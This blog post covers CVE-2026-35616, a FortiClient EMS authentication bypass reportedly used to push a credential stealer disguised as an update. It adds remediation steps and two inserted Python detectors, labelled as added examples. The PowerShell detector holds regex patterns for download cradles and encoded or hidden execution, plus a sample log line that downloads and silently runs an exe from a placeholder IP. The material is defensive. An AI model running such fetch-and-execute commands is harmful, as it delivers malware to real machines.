
CVE-2026-35616: Your Security Tool Just Installed Malware on Every Device

Attackers exploited FortiClient EMS to push a credential stealer disguised as a Fortinet firmware update. Your endpoint management system delivered the malware for them. You can't make this up.

Darius J Davis · May 29, 2026

#Your security software just attacked you.

I need you to sit with that for a second.

FortiClient EMS is an endpoint management system. Its job is to manage and secure every device in your organization. Push updates, enforce policies, make sure everything is patched and protected. It's the tool your IT provider uses to keep your fleet healthy.

CVE-2026-35616 is a CVSS 9.1 authentication bypass in FortiClient EMS that lets an unauthenticated attacker send privileged requests to the management server. No login. No credentials. Just forge a header and you're in.

What did the attackers do with that access? They used FortiClient EMS to push malware to every managed endpoint in the organization. Disguised as a Fortinet firmware update. Delivered through PowerShell. Silently executed on every device that trusts the management server.

The malware is called EKZ Infostealer. It grabs:

  • Chrome and Firefox saved passwords (including bypassing Chrome's encrypted storage)
  • Credit card details saved in browsers
  • Addresses and phone numbers from autofill
  • Session cookies (which let attackers access accounts protected by MFA without needing the second factor)

Every device. Every browser. Every saved password. All delivered by the tool that was supposed to protect them.

#Let me spell out why this is so bad.

The whole point of endpoint management is trust. Your devices trust the management server. They accept whatever it pushes. Updates, configurations, policies, software installs. That trust is the foundation of the entire system.

When an attacker compromises the management server, they inherit that trust. They become your IT department. They can push anything to every device and every device will accept it because "it came from the management server."

This isn't a theoretical problem. Arctic Wolf documented this exact attack happening in the wild. Real organizations. Real credential theft. Real damage.

And the beautiful (terrible) part? The malware was disguised as a legitimate Fortinet patch. So even if someone noticed a new install on their machine, it looked like a routine update. Nothing suspicious. Move along.


#This keeps happening with Fortinet.

I'm going to be blunt. Fortinet has had a rough couple of years. This is not the first critical Fortinet vulnerability, and the pattern is getting hard to ignore:

  • CVE-2026-35616: FortiClient EMS authentication bypass (this one)
  • Multiple FortiOS vulnerabilities exploited throughout 2025-2026
  • Part of the 56% of compromised networks that trace back to edge device exploitation

If you're running Fortinet products, you need to be monitoring their PSIRT advisories weekly. Not monthly. Not "when we get around to it." Weekly.

And you need to be honest with yourself about whether your team has the capacity to respond to critical CVEs within 72 hours. Because the attackers are responding within hours.

#What to do right now.

If you run FortiClient EMS:

  1. Patch to version 7.4.7 or later. Hotfixes are available for 7.4.5 and 7.4.6. Don't wait for the next maintenance window.
  2. Check for indicators of compromise. Look for unusual PowerShell execution on managed endpoints. Look for unexpected outbound connections. Look for the EKZ payload (Arctic Wolf's blog has the IOCs).
  3. Rotate every credential that was stored in a browser on any managed device. If the attacker got EKZ onto your endpoints, they have every saved password. Every one. Change them all. Yes, all of them.
  4. Invalidate active browser sessions. The attacker stole cookies, which means they can access accounts without passwords or MFA. Force re-authentication on every service: Microsoft 365, Google Workspace, banking, CRM, everything.
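One way to do the PowerShell triage in step 2, as an added example that is not from the post or from Arctic Wolf: a small Python scorer over script-block log records (export Event ID 4104 from managed endpoints with Get-WinEvent and ConvertTo-Json, then map the fields onto the ones used here). The sample events, hostnames, URL, base64 filler and rule weights are all constructed for illustration; the rule list is a starting point, not a complete signature set.

```python
import re

# Constructed sample records shaped like exported PowerShell script-block events
# (Event ID 4104 in Microsoft-Windows-PowerShell/Operational). Hostnames, the
# URL and the base64 filler are placeholders, not indicators from any report.
SAMPLE_EVENTS = [
    {"host": "WS-017", "user": "SYSTEM",
     "script": "Get-Service FortiClient* | Select-Object Name, Status"},
    {"host": "WS-042", "user": "SYSTEM",
     "script": "Invoke-WebRequest -Uri http://203.0.113.9/FortiClientUpdate.exe "
               "-OutFile $env:TEMP\\fcupd.exe; "
               "Start-Process $env:TEMP\\fcupd.exe -WindowStyle Hidden"},
    {"host": "WS-043", "user": "SYSTEM",
     "script": "powershell -NoProfile -ExecutionPolicy Bypass "
               "-EncodedCommand QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},  # filler
]

# (rule name, weight, case-insensitive regex). Weights are a triage starting
# point chosen for this example, not a published scoring scheme.
RULES = [
    ("download_cradle", 3,
     r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer"),
    ("encoded_command", 3, r"-e(c|nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"),
    ("exec_policy_bypass", 2, r"-(ExecutionPolicy|ep)\s+Bypass"),
    ("hidden_window", 2, r"-(WindowStyle|w)\s+Hidden"),
    ("launch", 2, r"Start-Process|Invoke-Expression|\biex\b|\[Reflection\.Assembly\]"),
    ("temp_drop", 1, r"\$env:TEMP|\\ProgramData\\|\\Windows\\Temp\\"),
    ("vendor_named", 1, r"forti(client|net|os|gate)"),
]

def score_block(script):
    """Score one script block; returns (score, matched rule names)."""
    hits = [name for name, _, rx in RULES if re.search(rx, script, re.IGNORECASE)]
    score = sum(w for name, w, _ in RULES if name in hits)
    # Download plus execution in the same block is the drop-and-run shape a
    # fake "firmware update" takes; weight the combination above its parts.
    if "download_cradle" in hits and "launch" in hits:
        score += 3
    return score, hits

def triage(events, threshold=4):
    """Return the events worth an analyst's time, highest score first."""
    findings = []
    for ev in events:
        score, hits = score_block(ev["script"])
        if score >= threshold:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "score": score, "rules": hits})
    return sorted(findings, key=lambda f: -f["score"])

print(triage(SAMPLE_EVENTS))
```

Script block logging has to be enabled on the endpoints before any 4104 events exist, and a hit is a reason to pull the full block and the process tree around it, not a verdict on its own.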

For everyone else:

  1. Audit what your endpoint management system can do. Whatever tool you use (Intune, Jamf, ConnectWise, NinjaOne, whatever), understand the level of access it has. If it's compromised, what can the attacker push? What can they access? This is your blast radius.
  2. Restrict management server access. Your EMS/RMM server should not be reachable from the public internet without a VPN or IP allowlist. If an unauthenticated attacker can reach it from anywhere, you're one CVE away from this exact scenario.
  3. Monitor management server activity. Log every action. Alert on unexpected software pushes, policy changes, or new device enrollments. The attackers used the legitimate management channel, so traditional endpoint detection might not catch it. You need to watch the management plane itself.
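The management-plane monitoring in step 3 as an added Python example (not the post's, Fortinet's or any RMM vendor's code): it runs a baseline of approved packages, admin source networks and a change window over management audit events and returns the ones worth a ticket. The JSON-lines event shape, the IPs, the package names and the thresholds are all assumed and constructed here; FortiClient EMS and the other tools named above each have their own export format, so map their fields onto these names.

```python
import json
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed audit events in an assumed JSON-lines shape. IPs are from
# documentation ranges and the package names are made up for the example.
SAMPLE_AUDIT_LOG = """\
{"ts": "2026-05-27T02:14:05Z", "actor": "admin", "src_ip": "198.51.100.7", "action": "deploy_package", "package": "FortiClient-Firmware-Update.ps1", "targets": 412}
{"ts": "2026-05-27T09:30:00Z", "actor": "jsmith", "src_ip": "10.20.0.15", "action": "policy_change", "detail": "web filter profile updated"}
{"ts": "2026-05-27T10:02:11Z", "actor": "jsmith", "src_ip": "10.20.0.15", "action": "deploy_package", "package": "FortiClientSetup_7.4.7.exe", "targets": 3}
{"ts": "2026-05-27T10:05:41Z", "actor": "jsmith", "src_ip": "10.20.0.15", "action": "enroll_device", "device": "WS-101"}
"""

# Baseline the detector compares against. The allowlist is by package name
# only to keep the example short; in practice key it on the installer's hash.
APPROVED_PACKAGES = {"FortiClientSetup_7.4.7.exe"}
ADMIN_NETWORKS = [ip_network("10.20.0.0/16")]   # where admins may log in from
CHANGE_WINDOW_UTC = (8, 18)                      # deployments expected 08:00-18:00 UTC
MASS_PUSH_THRESHOLD = 50                         # fleet-wide pushes need a change ticket

def check_event(ev):
    """Return (hard_reasons, review_reasons) for one audit event."""
    hard, review = [], []
    if not any(ip_address(ev["src_ip"]) in net for net in ADMIN_NETWORKS):
        hard.append("source %s outside admin allowlist" % ev["src_ip"])
    if ev["action"] == "deploy_package":
        hour = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00")).hour
        if ev["package"] not in APPROVED_PACKAGES:
            hard.append("unapproved package %s" % ev["package"])
        if not CHANGE_WINDOW_UTC[0] <= hour < CHANGE_WINDOW_UTC[1]:
            hard.append("deployment outside change window (%02d:00 UTC)" % hour)
        if ev.get("targets", 0) >= MASS_PUSH_THRESHOLD:
            hard.append("mass push to %d endpoints" % ev["targets"])
    elif ev["action"] in ("policy_change", "enroll_device"):
        review.append("%s by %s" % (ev["action"], ev["actor"]))   # always worth a look
    return hard, review

def detect(log_text):
    """Run every JSON line through check_event and return the alerts worth a ticket."""
    alerts = []
    for line in filter(str.strip, log_text.splitlines()):
        ev = json.loads(line)
        hard, review = check_event(ev)
        if hard or review:
            alerts.append({"ts": ev["ts"], "action": ev["action"],
                           "severity": "high" if hard else "review",
                           "reasons": hard + review})
    return alerts

for a in detect(SAMPLE_AUDIT_LOG):
    print(a["severity"].upper(), a["ts"], a["action"], "; ".join(a["reasons"]))
```

The 02:14 UTC push from a public address to 412 endpoints trips all four hard rules; the approved 7.4.7 installer pushed to three machines during the day produces nothing, which is the whole point of having a baseline to compare against.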

#The uncomfortable truth about managed security.

A lot of small businesses outsource their security to an MSP that uses exactly these tools. FortiClient EMS, ConnectWise, Datto, NinjaOne. The MSP manages hundreds of clients through a single management platform.

If the MSP's management platform gets compromised, every client gets compromised simultaneously. One vulnerability, one exploit, hundreds of businesses.

This isn't hypothetical. It's happened before (see: Kaseya VSA, 2021) and it will happen again. The question is whether your MSP is monitoring for it, patching for it, and prepared to respond.

Ask your MSP: "How quickly can you patch a critical CVE in your management platform?" If the answer is anything slower than "same day," that's your risk.
